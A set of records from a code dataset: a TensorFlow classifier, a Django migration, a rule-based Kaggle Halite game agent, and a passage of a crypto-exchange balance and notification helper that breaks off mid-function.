+{"seq_id":"486820110","text":"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import np_utils\nimport Dataset\n\n\nclass Neural():\n\n def __init__(self):\n # Create the model:\n self.model = tf.keras.models.Sequential()\n\n # Add layers\n self.model.add(tf.keras.layers.Dense(60, activation='tanh'))\n self.model.add(tf.keras.layers.Dense(60, activation='relu'))\n self.model.add(tf.keras.layers.Dense(16, activation='tanh'))\n self.model.add(tf.keras.layers.Dropout(0.2))\n self.model.add(tf.keras.layers.Dense(1, activation='sigmoid'))\n\n # Loss computer:\n self.train_loss_object = tf.keras.losses.BinaryCrossentropy()\n self.test_loss_object = tf.keras.losses.BinaryCrossentropy()\n\n # Loss accumulator:\n self.train_loss_accu = tf.keras.metrics.Mean(name='train_loss')\n self.test_loss_accu = tf.keras.metrics.Mean(name='Test_loss')\n\n # Optimizer\n self.optimizer = tf.keras.optimizers.Adam()\n\n # Training_set to use\n self.dataset = None\n\n @tf.function\n def train_step(self, x_train, y_train, x_test, y_test, s_weights_train, s_weights_test):\n \"\"\"\n Training function\n \"\"\"\n # Find gradient:\n with tf.GradientTape() as tape: # To capture errors for the gradient modification\n # Make prediction\n train_predictions = self.model(x_train)\n # Get the error:\n train_loss = self.train_loss_object(y_train, train_predictions, sample_weight=s_weights_train)\n # Compute the gradient who respect the loss\n gradients = tape.gradient(train_loss, self.model.trainable_variables)\n # Change weights of the model\n self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n # Store losses:\n self.train_loss_accu(train_loss)\n # If test error wanted\n\n if x_test is not None:\n # Compute test error:\n test_predictions = self.model(x_test)\n test_loss = self.train_loss_object(y_test, test_predictions, sample_weight=s_weights_test)\n self.test_loss_accu(test_loss)\n\n\n def train(self):\n\n x_train = self.dataset.pairs_train_x\n y_train = self.dataset.pairs_train_y\n x_test = self.dataset.pairs_test_x\n y_test = self.dataset.pairs_test_y\n\n # Build sample weights:\n s_weights_train = np.ones(x_train.shape[0])\n s_weights_test = np.ones(x_test.shape[0])\n for i in range(0, x_train.shape[0]):\n if y_train[i] == 1:\n s_weights_train[i] = 21\n for i in range(0, x_test.shape[0]):\n if y_test[i] == 1:\n s_weights_test[i] = 21\n\n s_weights_test = y_test * 21\n for epoch in range(0, 20):\n for _ in range(0, 100):\n # Make a train step\n self.train_step(x_train, y_train, x_test, y_test, s_weights_train, s_weights_test)\n\n print('Epoch: {}'.format(epoch))\n # Print the loss: return the mean of all error in the accumulator\n print('Test Loss: %s' % self.test_loss_accu.result())\n print('Train Loss: %s' % self.train_loss_accu.result())\n # Reset the accumulator\n self.train_loss_accu.reset_states()\n self.test_loss_accu.reset_states()\n\n def predict_pass(self, df_x):\n\n # Adapt inputs according to features of the learning set\n x_pairs = self.dataset.convertor(df_x)\n # Numpy version\n df_np = df_x.to_numpy()\n\n # Make predictions:\n pred = self.model.predict(x_pairs)\n # Reshape:\n pred = np.reshape(pred, (-1, 22))\n # Store final numeric prediction:\n final_pred = np.zeros(pred.shape[0])\n for i in range(0, pred.shape[0]):\n final_pred[i] = np.argmax(pred[i, :]) + 1\n\n return final_pred\n\n def set_dataset(self, dataset):\n\n self.dataset = dataset\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"old3/Neural_Ben.py","file_name":"Neural_Ben.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"448635925","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tablefor2', '0032_auto_20170710_0507'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='distinct_id',\n field=models.CharField(max_length=50, null=True),\n ),\n migrations.AlterField(\n model_name='availability',\n name='time_available',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 858493, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='availability',\n name='time_available_utc',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 858512, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='profile',\n name='date_joined',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 857178, tzinfo=utc)),\n ),\n ]\n","sub_path":"tablefor2/migrations/0033_auto_20170717_0106.py","file_name":"0033_auto_20170717_0106.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455498687","text":"from kaggle_environments.envs.halite.helpers import Board, ShipAction, ShipyardAction\nimport pandas as pd\nimport numpy as np\n\n\nclass DecisionShip:\n \"\"\" \n Decides ship's next move\n params:\n board: the board that we will base our decisions on\n ship: the ship we are deciding for\n step: the steps into the stimulation\n \"\"\"\n def __init__(self, board: Board, ship_id, step):\n self.board = board\n self.ship = board.ships[ship_id]\n self.step = step\n # Some usefull properties\n self.player = self.board.current_player\n self.ship_cargo = self.ship.halite\n self.current_cell = self.ship.cell\n self.current_position = self.ship.position\n # All moves ship can take\n self.moves = {\"N\": ShipAction.NORTH, 'S': ShipAction.SOUTH, 'W': ShipAction.WEST,\n 'E': ShipAction.EAST, 'convert': ShipAction.CONVERT, 'mine': None}\n # The list of moves that should not be taken\n self.eliminated_moves = ['None']\n # Weights of different moves\n self.weights = {\"N\": 0, \"E\": 0, \"W\": 0, \"S\": 0, \"mine\": 0, \"convert\": 0, 'None': 0}\n # The cells around the main one\n self.grid = grid(self.ship.cell)\n # Closest shipyard id and the distance\n self.closest_shipyard_id, self.closest_shipyard_distance = self.closest_shipyard()\n # Default move which is set to mining (None)\n self.next_move = None\n # This variable holds info on the cell being analyzed\n self.current = {}\n # Setting the hyper parameters\n self.set_hyperparameters()\n\n def set_hyperparameters(self):\n \"\"\" Initializes the hyperparameters that will affect the decision process \"\"\"\n self.MINING = 600 + (self.step // 40) * 100\n self.DEPOSIT = 800 + (self.step // 300) * 300 + self.step // 380 * 1000\n self.ATTACK_ENEMY_SHIP = 600 - (self.step // 150) * 200\n self.DIRECTION_ENCOURAGEMENT = 150 - (self.step // 120) * 40 \n self.DISTRIBUTION = -1000 + (self.step // 200) * 50\n self.GET_AWAY = -500 + (self.step // 100) * 20\n self.CLOSEST_SHIPYARD = 500 + (self.step // 60) * 100\n self.CONVERSION = 80 - (self.step // 200) * 10\n self.CARGO_THRESHHOLD = 600\n\n def determine(self):\n \"\"\" Returns next action decided for the ship based on the observations that have been made. \"\"\"\n self.weight_moves() # Calculate the weights for main four directions\n self.round() # Round the weights\n self.apply_elimination() # Apply the eliminations\n\n # Sort the values\n sorted_weights = {k: v for k, v in sorted(self.weights.items(), key=lambda item: item[1], reverse=True)}\n\n # Choose the action with highest value given that it is not eliminated\n for action in sorted_weights.keys():\n return self.moves[action], action\n\n # If none were chosen, then just return the default move which is mining\n return self.next_move, 'mine'\n\n def add_accordingly(self, value, title=\"\", loging=False):\n \"\"\" Adds a value to directions according to their corresponding weights \"\"\"\n weightX, weightY, dirX, dirY, movesX, movesY = 0, 0, \"\", \"\", 0, 0\n\n if \"N\" in self.current['dir']:\n dirY, movesY = 'N', self.current['dir'].count(\"N\")\n weightY = 1 / (len(self.current['dir']) ** 2 * movesY)\n elif \"S\" in self.current['dir']:\n dirY, movesY = 'S', self.current['dir'].count(\"S\")\n weightY = 1 / (len(self.current['dir']) ** 2 * movesY)\n\n if \"W\" in self.current['dir']:\n dirX, movesX = 'W', self.current['dir'].count(\"W\")\n weightX = 1 / (len(self.current['dir']) ** 2 * movesX)\n elif \"E\" in self.current['dir']:\n dirX, movesX = 'E', self.current['dir'].count(\"E\")\n weightX = 1 / (len(self.current['dir']) ** 2 * movesX)\n\n if weightX != 0: self.weights[dirX] += value * weightX\n if weightY != 0: self.weights[dirY] += value * weightY\n \n def weight_convert(self, base_threshold=400):\n \"\"\" Weights the option for ship conversion \"\"\"\n # Calculating the threshhold\n threshold = base_threshold + 1000 * (len(self.player.shipyards) // 3)\n # 1. If they are no shipyards left\n no_shipyards = len(self.player.shipyards) == 0\n # 2. There will be a threshold for the amount of cargo any ship could have\n threshhold_reach = self.ship.halite >= threshold\n # 3. On shipyard already\n on_shipyard = self.ship.cell.shipyard is not None\n\n if self.player.halite + self.ship.halite >= 500:\n if no_shipyards and not on_shipyard:\n self.weights['convert'] = 1e8\n elif not on_shipyard:\n self.weights['convert'] = (self.ship_cargo - threshold) * self.CONVERSION\n elif on_shipyard:\n self.eliminated_moves.append('convert')\n else:\n self.eliminated_moves.append('convert')\n\n def weight_moves(self):\n \"\"\" This is the main function and runs other helper functions within the module to to weight the different moves that could be taken. \"\"\"\n \n # Weight the CONVERT option\n self.weight_convert()\n\n # See if any of the shipyards need defending\n self.shipyard_status()\n \n interval = min(220, 11000 // len(self.player.ships) + 1)\n \n # Iterate through different directions\n for direction, cell in dict(list(self.grid.items())[:interval]).items():\n # Set the global direction to the one at hand\n self.current['dir'] = direction\n self.current['cell'] = cell\n\n # 1. Evaluate the moves based on other objects present in the map\n # 1.1 If there was a ship\n if cell.ship is not None:\n # If it was my ship\n if cell.ship.id in self.player.ship_ids:\n self.distribute_ships(cell.ship_id)\n else:\n self.deal_enemy_ship(cell.ship_id)\n\n # 1.2 If there was a shipyard\n if cell.shipyard is not None:\n if cell.shipyard.id in self.player.shipyard_ids:\n self.deposit()\n else:\n self.attack_enemy_shipyard(cell.shipyard_id)\n\n # 2. Trigger movement in the main four direction solely based on the amount of halite each cell has\n main_dir_encourage = self.DIRECTION_ENCOURAGEMENT * self.grid[direction].halite + 10\n self.add_accordingly(main_dir_encourage, title=' main4: ', loging=False)\n\n # 3. Either encourage mining or discourage it by adding the difference between cells to the mine\n mining_trigger = (self.current_cell.halite - self.grid[direction].halite) / len(direction)\n\n self.weights['mine'] += mining_trigger\n\n # The correlation of the mining with cell's halite\n self.weights['mine'] += self.current_cell.halite * self.MINING\n\n def distribute_ships(self, ship_id):\n \"\"\" This function lowers the ships tendency to densely populate an area \"\"\"\n if not self.near_end() or self.step > 388:\n if len(self.current['dir']) == 1: self.eliminated_moves.append(self.current['dir'])\n\n distribution_encouragement = -10 * abs(self.ship_cargo - self.board.ships[ship_id].halite)\n\n self.add_accordingly(distribution_encouragement, title='Distribution', loging=False)\n\n def deal_enemy_ship(self, ship_id):\n \"\"\" This function will evaluate to either attack or get_away from an enemy ship based on the \n simple observation: If my ship had more cargo then I should not attack. \"\"\"\n # If the ship's cargo was more than enemy's cargo and it was not equal to zero then get away otherwise attack\n if self.ship_cargo > (self.board.ships[ship_id].halite + 0.4 * self.current['cell'].halite):\n self.get_away(cargo_diff=abs(self.board.ships[ship_id].halite - self.ship_cargo))\n else:\n self.attack_enemy_ship(abs(self.board.ships[ship_id].halite - self.ship_cargo))\n\n def attack_enemy_ship(self, diff):\n \"\"\" This function encourages attacking the enemy ship \"\"\"\n attack_encouragement = self.ATTACK_ENEMY_SHIP * (diff + 1) / (self.closest_shipyard_distance + 0.1)\n self.add_accordingly(attack_encouragement, title='Attacking-Enemy-Ship', loging=False)\n \n def get_away(self, cargo_diff=0):\n \"\"\" This function is called when my ship needs to get away from a ship which might be following it \"\"\"\n # 1. Directly discouraging the movement\n if len(self.current['dir']) == 1:\n self.eliminated_moves.append(self.current['dir'])\n if 'mine' in self.weights.keys(): self.eliminated_moves.append('mine')\n direction_discouragement = 0\n elif len(self.current['dir']) == 2:\n # When the enemy ship is two moves away, there should be a strong discouragement\n direction_discouragement = 5 * self.GET_AWAY * (self.ship.halite + 10)\n else:\n direction_discouragement = self.GET_AWAY * cargo_diff\n \n self.add_accordingly(direction_discouragement, title='Get-Away', loging=False)\n\n # 2. Encouraging going to the closest shipyard\n closest_shipyard_encouragement = cargo_diff\n self.go_to_closest_shipyard(closest_shipyard_encouragement)\n\n def deposit(self):\n \"\"\" Weights the tendency to deposit and adds to the directions which lead to the given shipyard \"\"\"\n if self.near_end():\n deposit_tendency = 16 * self.DEPOSIT * self.ship_cargo\n else:\n deposit_tendency = self.DEPOSIT * self.ship_cargo \n self.add_accordingly(deposit_tendency, title='Deposit', loging=False)\n\n def attack_enemy_shipyard(self, shipyard_id):\n \"\"\" Weights the tendency to attack the enemy shipyard. \"\"\"\n dist_to_shipyard = measure_distance(self.board.shipyards[shipyard_id].position, self.current['cell'].position)\n if len(self.player.ships) >= 2 and self.player.halite > 700 and self.ship_cargo < 30 and dist_to_shipyard < 5:\n destory_shipyard = 1e5 / len(self.current['dir'])\n self.add_accordingly(destory_shipyard, title='Destroy_en_shipyard', loging=False)\n elif len(self.current['dir']) == 1 and self.ship_cargo > 100:\n self.eliminated_moves.append(self.current['dir'])\n\n def go_to_closest_shipyard(self, value):\n \"\"\" Encourage movement towards the nearest shipyard \"\"\"\n if self.closest_shipyard_id != 0.99: # Given that there is a closest shipyard\n (x, y) = self.board.shipyards[self.closest_shipyard_id].position\n\n if x > self.current_cell.position.x:\n self.weights['E'] += value\n elif x < self.current_cell.position.x:\n self.weights['W'] += value\n\n if y > self.current_cell.position.y:\n self.weights['N'] += value\n elif y < self.current_cell.position.y:\n self.weights['S'] += value\n\n def shipyard_status(self):\n \"\"\" Measures tendency for the shipyards within the map \"\"\"\n if len(self.player.shipyards) != 0:\n for shipyard in self.player.shipyards:\n self.analyze_shipyard_surroundings(shipyard.id)\n\n def analyze_shipyard_surroundings(self, shipyard_id):\n \"\"\" Analyzes the tendency to go toward a specific shipyard \"\"\"\n shipyard, value = self.board.shipyards[shipyard_id], 0\n shipyard_grid = grid(shipyard.cell)\n\n for direction, cell in list(shipyard_grid.items())[:24]:\n ship_id = shipyard_grid[direction].ship_id\n # If there is a ship on that cell\n if cell.ship is not None:\n if cell.ship.id in self.player.ship_ids:\n value += -1e5 / (self.ship_cargo + 0.99)\n else:\n value += 1e5 /(cell.ship.halite + 0.99) \n\n # Don't discourage any move toward a shipyards\n if value > 0:\n currentDir = \"\"\n\n if shipyard.position.x > self.current_position.x:\n currentDir += \"E\" * abs(shipyard.position.x - self.current_position.x)\n elif shipyard.position.x < self.current_position.x:\n currentDir += \"W\" * abs(shipyard.position.x - self.current_position.x)\n\n if shipyard.position.y > self.current_position.y:\n currentDir += \"S\" * abs(shipyard.position.y - self.current_position.y)\n elif shipyard.position.y < self.current_position.y:\n currentDir += \"N\" * abs(shipyard.position.y - self.current_position.y)\n\n if currentDir != \"\":\n self.current['dir'] = currentDir\n self.add_accordingly(value, title=' Yard-sur', loging=True)\n\n def closest_shipyard(self):\n \"\"\" Returns the closest shipyard's id \"\"\"\n closest_id, diff = 0.99, 0.99\n for shipyard in self.player.shipyards:\n distance = measure_distance(self.current_cell.position, shipyard.cell.position)\n if diff > distance or diff == 0.99:\n closest_id, diff = shipyard.id, distance\n return closest_id, diff\n \n def near_end(self):\n \"\"\" Determines if the game is about to end so the ships with halite can convert to shipyard and maximum the halite we will end up with \"\"\"\n count = 0\n # If the halite was less than 500 and it had no ships\n for opp in self.board.opponents:\n if opp.halite < 500 and len(opp.ships) == 0 and self.player.halite > opp.halite: count += 1\n if opp.halite > 2000 and len(opp.ships) > 1: count -= 1\n # If count was more than 2 return True\n return count >= 2\n\n def apply_elimination(self):\n \"\"\" Eliminates the moves to be eliminated. \"\"\"\n for move in self.eliminated_moves:\n if move in self.weights.keys():\n del self.weights[move]\n\n def round(self):\n \"\"\" This functions rounds the weights so they can be easily printed \"\"\"\n self.weights['mine'] = round(self.weights['mine'], 1)\n self.weights['N'] = round(self.weights['N'], 1)\n self.weights['S'] = round(self.weights['S'], 1)\n self.weights['E'] = round(self.weights['E'], 1)\n self.weights['W'] = round(self.weights['W'], 1)\n self.weights['convert'] = round(self.weights['convert'], 1)\n\n\n\ndef measure_distance(org, dest):\n \"\"\" Measures the distance between two points \"\"\"\n x_1 = abs(org.x - dest.x)\n x_2 = abs(21 - org.x + dest.x)\n y_1 = abs(org.y - dest.y)\n y_2 = abs(21 - org.y + dest.y)\n\n return min((x_1 + y_1), (x_1 + y_2), (x_2 + y_1), (x_2 + y_2))\n \nclass ShipyardDecisions:\n def __init__(self, board: Board, player, step):\n \"\"\"\n Decides the Shipyard's next action based on the given parameters\n board: The board that we will be observing\n step: step of the stimulation\n \"\"\"\n self.board = board\n self.player = player\n self.player_halite = player.halite\n self.step = step\n self.Shipyards = player.shipyards\n self.shipyard_tendencies = {}\n\n def determine(self):\n \"\"\" Determines which shipyards should SPAWN, returns a dictionary of id: 'SPAWN' \"\"\"\n self.weight_shipyard_tendencies()\n sorted_weights = {k: v for k, v in\n sorted(self.shipyard_tendencies.items(), key=lambda item: item[1], reverse=True)}\n \n shipyard_ids = []\n for shipyard_id, tendency in sorted_weights.items():\n if tendency > 5 and self.player_halite >= 500:\n shipyard_ids.append(shipyard_id)\n\n # log('Shipyards: ' + str(shipyard_ids))\n return shipyard_ids\n\n def weight_shipyard_tendencies(self):\n \"\"\" Iterates through the shipyards and weights their tendencies. \"\"\"\n for shipyard in self.Shipyards:\n # Weighting will take place only when there are no ships on the cell\n if shipyard.cell.ship is None:\n weight = self.weight(grid(shipyard.cell))\n\n self.shipyard_tendencies[shipyard.id] = weight\n\n def weight(self, grid):\n \"\"\"\n Weights shipyard's tendency to spawn solely based on the objects around it\n The weighting system is rather simple:\n - If there was an enemy ship add to the weight\n - If there was one of my own ships, then subtract from the weight\n Take the distance of the ship into account\n \"\"\"\n if len(self.board.current_player.ships) == 0: return 10\n if self.step < 150 and self.player_halite >= 500: return 10\n\n value = 0\n # Iterating through the grid\n for direction, cell in grid.items():\n if cell.ship is not None:\n if cell.ship.id in self.player.ship_ids:\n value -= 200 / len(direction) ** 2\n else:\n value += 100 / len(direction) ** 2\n # If there was an enemy ship one move away from my shipyard then spawn\n if len(direction) == 1 and self.player_halite > 500: \n value += 1e3 \n\n if cell.shipyard is not None:\n if cell.shipyard.id in self.player.shipyard_ids:\n value += 50 / len(direction) ** 2\n\n return value\n\ndef grid(cell, moves=10):\n \"\"\" Returns a dictionary of cells which are in 10 moves distance of the given cell \"\"\"\n # The directions that are one move away\n north, south, west, east = cell.north, cell.south, cell.west, cell.east\n # The directions that are two moves away\n n2, s2, w2, e2 = north.north, south.south, west.west, east.east\n n3, s3, w3, e3 = n2.north, s2.south, w2.west, e2.east\n n4, s4, w4, e4 = n3.north, s3.south, w3.west, e3.east\n n5, s5, w5, e5 = n4.north, s4.south, w4.west, e4.east\n n6, s6, w6, e6 = n5.north, s5.south, w5.west, e5.east\n n7, s7, w7, e7 = n6.north, s6.south, w6.west, e6.east\n n8, s8, w8, e8 = n7.north, s7.south, w7.west, e7.east\n n9, s9, w9, e9 = n8.north, s8.south, w8.west, e8.east\n n10, s10, w10, e10 = n9.north, s9.south, w9.west, e9.east\n \n return {\n # 1 move away\n 'N': north, 'S': south, 'W': west, 'E': east,\n # 2 moves away\n 'NW': north.west, 'NE': north.east, 'SW': south.west, 'SE': south.east, 'WW': w2, 'EE': e2, 'NN': n2, 'SS': s2,\n # 3 moves away\n 'SSS': s3, 'EEE': e3, 'WWW': w3, 'NNN': n3,\n 'ENN': n2.east, 'WNN': n2.west, 'ESS': s2.east, 'WSS': s2.west,\n 'SEE': e2.south, 'NEE': e2.north, 'SWW': w2.south, 'NWW': w2.north,\n # 4 moves away\n 'NNNN': n4, 'SSSS': s4, 'WWWW': w4, 'EEEE': e4,\n 'EESS': e2.south.south, 'EENN': e2.north.north, 'WWNN': w2.north.north, 'WWSS': w2.south.south,\n 'WWWS': w3.south, 'EEES': e3.south, 'EEEN': e3.north, 'WWWN': w3.north,\n 'SSSW': s3.west, 'SSSE': s3.east, 'NNNE': n3.east, 'NNNW': n3.west,\n # 5 moves away\n 'SSSSS': s5, 'NNNNN': n5, 'WWWWW': w5, 'EEEEE': e5,\n 'WWWWN': w4.north, 'WWWWS': w4.south, 'EEEEN': e4.north, 'EEEES': e4.south,\n 'SSSSE': s4.east, 'SSSSW': s4.west, 'NNNNW': n4.west, 'NNNNE': n4.east,\n 'EESSS': s3.east.east, 'WWSSS': s3.west.west, 'EENNN': n3.east.east, 'WWNNN': n3.west.west,\n 'EEESS': e3.south.south, 'EEENN': e3.north.north, 'WWWSS': w3.south.south, 'WWWNN': w3.north.north,\n # 6 moves away\n 'SSSSSS': s6, 'NNNNNN': n6, 'WWWWWW': w6, 'EEEEEE': e6,\n 'WWWWWN': w5.north, 'WWWWWS': w5.south, 'EEEEEN': e5.north, 'EEEEES': e5.south,\n 'SSSSSE': s5.east, 'SSSSSW': s5.west, 'NNNNNW': n5.west, 'NNNNNE': n5.east,\n 'WWWWNN': w4.north.north, 'WWWWSS': w4.south.south, 'EEEENN': e4.north.north, 'EEEESS': e4.south.south,\n 'NNNNEE': n4.east.east, 'NNNNWW': n4.west.west, 'SSSSWW': s4.west.west, 'SSSSEE': s4.east.east,\n 'EEENNN': e3.north.north.north, 'EEESSS': e3.south.south.south, 'WWWNNN': w3.north.north.north, 'WWWSSS': w3.south.south.south,\n # 7 moves away\n 'SSSSSSS': s7, 'NNNNNNN': n7, 'WWWWWWW': w7, 'EEEEEEE': e7,\n 'WWWWWWN': w6.north, 'WWWWWWS': w6.south, 'EEEEEEN': e6.north, 'EEEEEES': e6.south,\n 'SSSSSSE': s6.east, 'SSSSSSW': s6.west, 'NNNNNNW': n6.west, 'NNNNNNE': n6.east,\n 'WWWWWNN': w5.north.north, 'WWWWWSS': w5.south.south, 'EEEEENN': e5.north.north, 'EEEEESS': e5.south.south,\n 'NNNNNWW': n5.west.west, 'NNNNNEE': n5.east.east, 'SSSSSWW': s5.west.west, 'SSSSSEE': s5.east.east,\n 'EEEENNN': e4.north.north.north, 'EEEESSS': e4.south.south.south, 'WWWWNNN': w4.north.north.north, 'WWWWSSS': w4.south.south.south,\n 'NNNNEEE': n4.east.east.east, 'NNNNWWW': n4.west.west.west, 'SSSSWWW': s4.west.west.west, 'SSSSEEE': s4.east.east.east,\n # 8 moves away\n 'SSSSSSSS': s8, 'NNNNNNNN': n8, 'WWWWWWWW': w8, 'EEEEEEEE': e8,\n 'WWWWWWWN': w7.north, 'WWWWWWWS': w7.south, 'EEEEEEEN': e7.north, 'EEEEEEES': e7.south,\n 'SSSSSSSE': s7.east, 'SSSSSSSW': s7.west, 'NNNNNNNW': n7.west, 'NNNNNNNE': n7.east,\n 'WWWWWWNN': w6.north.north, 'WWWWWWWSS': w6.south.south, 'EEEEEEENN': e6.north.north, 'EEEEEEESS': e6.south.south,\n 'NNNNNNWW': n6.west.west, 'NNNNNNEE': n6.east.east, 'SSSSSSWW': s6.west.west, 'SSSSSSEE': s6.west.west,\n 'NNNNNWWW': n5.west.west.west, 'NNNNNEEE': n5.east.east.east, 'SSSSSWWW': s5.west.west.west, 'SSSSSEEE': s5.east.east.east,\n 'EEEEENNN': e5.north.north.north, 'EEEEESSS': e5.south.south.south, 'WWWWWNNN': w5.north.north.north, 'WWWWWSSS': w5.south.south.south,\n 'EEEENNNN': e4.north.north.north.north, 'WWWWNNNN': w4.north.north.north.north, 'EEEESSSS': e4.south.south.south.south, 'WWWWSSSS': w4.south.south.south.south,\n # 9 moves away\n 'SSSSSSSS': s9, 'NNNNNNNN': n9, 'WWWWWWWW': w9, 'EEEEEEEE': e9,\n 'WWWWWWWWN': w8.north, 'WWWWWWWWS': w8.south, 'EEEEEEEEN': e8.north, 'EEEEEEEES': e8.south,\n 'SSSSSSSSE': s8.east, 'SSSSSSSSW': s8.west, 'NNNNNNNNW': n8.west, 'NNNNNNNNE': n8.east,\n 'NNNNNNNEE': n7.east.east, 'NNNNNNNWW': n7.west.west, 'SSSSSSSEE': s7.east.east, 'SSSSSSSWW': s7.west.west,\n 'EEEEEEENN': e7.north.north, 'EEEEEEESS': e7.south.south, 'WWWWWWWNN': w7.north.north, 'WWWWWWWSS': w7.south.south,\n 'NNNNNNWWW': n6.west.west.west, 'NNNNNNEEE': n6.east.east.east, 'SSSSSSWWW': s6.west.west.west, 'SSSSSSEEE': s6.east.east.east,\n 'EEEEEENNN': e6.north.north.north, 'EEEEEESSS': e6.south.south.south, 'WWWWWWNNN': w6.north.north.north, 'WWWWWWSSS': w6.south.south.south,\n 'NNNNNWWWW': n5.west.west.west.west, 'NNNNNEEEE': n5.east.east.east.east, 'SSSSSWWWW': s5.west.west.west.west, 'SSSSSEEEE': s5.east.east.east.east,\n 'EEEEENNNN': e5.north.north.north.north, 'EEEEESSSS': e5.south.south.south.south, 'WWWWWNNNN': w5.north.north.north.north, 'WWWWWSSSS': w5.south.south.south.south,\n # 10 moves away\n 'SSSSSSSSS': s10, 'NNNNNNNNN': n10, 'WWWWWWWWW': w10, 'EEEEEEEEE': e10,\n 'WWWWWWWWWN': w9.north, 'WWWWWWWWWS': w9.south, 'EEEEEEEEEN': e9.north, 'EEEEEEEEES': e9.south,\n 'SSSSSSSSSE': s9.east, 'SSSSSSSSSW': s9.west, 'NNNNNNNNNW': n9.west, 'NNNNNNNNNE': n9.east,\n 'NNNNNNNNEE': n8.east.east, 'SSSSSSSSEE': s8.east.east, 'NNNNNNNNWW': n8.west.west, 'SSSSSSSSWW': s8.west.west,\n 'EEEEEEEENN': e8.north.north, 'EEEEEEEESS': e8.south.south, 'WWWWWWWWNN': w8.north.north, 'WWWWWWWWNN': w8.north.north,\n 'WWWWWWWNNN': w7.north.north, 'WWWWWWWSSS': w7.south.south, 'EEEEEEESSS': e7.south.south.south, 'EEEEEEEWWW': e7.north.north.north,\n 'NNNNNNNWWW': n7.west.west.west, 'NNNNNNNEEE': n7.east.east.east, 'SSSSSSSWWW': s7.west.west.west, 'SSSSSSSEEE': s7.east.east.east,\n 'WWWWWWNNNN': w6.north.north.north.north, 'WWWWWWSSSS': w6.south.south.south.south, 'EEEEEENNNN': e6.north.north.north.north, 'EEEEEESSSS': e6.south.south.south.south,\n 'NNNNNNWWWW': n6.west.west.west.west, 'NNNNNNEEEE': n6.east.east.east.east, 'SSSSSSWWWW': s6.west.west.west.west, 'SSSSSSEEEE': s6.east.east.east.east,\n 'NNNNNWWWWW': n5.west.west.west.west.west, 'NNNNNEEEEE': n5.east.east.east.east.east, 'SSSSSWWWWW': s5.west.west.west.west.west, 'SSSSSEEEEE': s5.east.east.east.east.east\n }\n\nmovement_dictionary = {\"S\": \"SOUTH\", 'N': 'NORTH', 'W': 'WEST', 'E': 'EAST', 'convert': 'CONVERT'}\n\nimport operator\n\ndef agent(obs, config):\n # Another for updates\n board = Board(obs, config)\n\n # Step of the board\n step = board.observation['step']\n\n ships = [ship.id for ship in sorted(board.current_player.ships, key=operator.attrgetter(\"halite\"), reverse=True)]\n actions = {}\n\n for ship_id in ships:\n if ship_id in board.current_player.ship_ids:\n next_action, action_type = DecisionShip(board, ship_id, step).determine()\n \n if action_type != 'mine':\n actions[ship_id] = movement_dictionary[action_type]\n board.ships[ship_id].next_action = next_action\n board = board.next()\n\n shipyard_ids = ShipyardDecisions(board, board.current_player, step).determine()\n\n for shipyard_id in board.current_player.shipyard_ids:\n if shipyard_id in shipyard_ids:\n actions[shipyard_id] = 'SPAWN'\n board.shipyards[shipyard_id].next_action = ShipyardAction.SPAWN\n \n board = board.next()\n \n return actions\n","sub_path":"agents/agent_e.py","file_name":"agent_e.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"591821339","text":"#This is designed to hold the api functions\nfrom bittrex import Bittrex\nfrom binance.client import Client\nfrom config import *\nimport time\nimport pandas as pd\nimport datetime\nimport requests as rq\nimport json\n\n\n#definitions\np = Bittrex(api_key_bittrex, api_secret_bittrex)\nclient = Client(api_key_binance, api_secret_binance)\n\n\ndef send_notification(title, body):\n\tdata_send = {\"type\": \"note\", \"title\": title, \"body\": body}\n\tresp = rq.post('https://api.pushbullet.com/v2/pushes', data=json.dumps(data_send),\n\t\t\t\t\t\t headers={'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'})\n\tif resp.status_code != 200:\n\t\traise Exception('Something wrong')\n\telse:\n\t\tprint('sent')\n\ndef getfiat(btc):\n\tr = rq.get(url='https://blockchain.info/ticker', params='')\n\tdata = r.json()\n\tusd = data['USD']['sell']\n\taud = data['AUD']['sell']\n\taudprice = float(aud)*float(btc)\n\tusdprice = float(usd)*float(btc)\n\treturn audprice, usdprice\n\ndef getbinancebalance():\n\tinfo = client.get_exchange_info()\n\tinfo = info['symbols']\n\tcoins = []\n\tcolumn_headers = ['coin','quantity','last','BTC value']\n\taccount = pd.DataFrame(columns=column_headers)\n\tfor item in info:\n\t\tcoin = item['baseAsset']\n\t\tif coin:\n\t\t\tcoins.append(coin)\n\tlistcoins = list(set(coins))\n\tfor item in listcoins:\n\t\tbalance = client.get_asset_balance(asset=item)\n\t\tquantity = float(balance['free'])\n\t\tif quantity > 0.0:\n\t\t\tif 'BTC' not in item:\n\t\t\t\tmarket = item.replace(item,'%sBTC'%(item))\n\t\t\t\tdepth = client.get_order_book(symbol=market)\n\t\t\t\tlast = depth['asks'][0][0]\n\t\t\t\tlast = '{:.8f}'.format(float(last))\n\t\t\t\tquantity = '{:.8f}'.format(quantity)\n\t\t\t\tvalue = float(last)*float(quantity)\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\taccount = account.append({'coin':market,'quantity':quantity,'last':last,'BTC value':value}, ignore_index=True)\n\t\t\tif 'BTC' in item:\n\t\t\t\tlast = '{:.8f}'.format(0)\n\t\t\t\tquantity = '{:.8f}'.format(float(quantity))\n\t\t\t\tvalue = 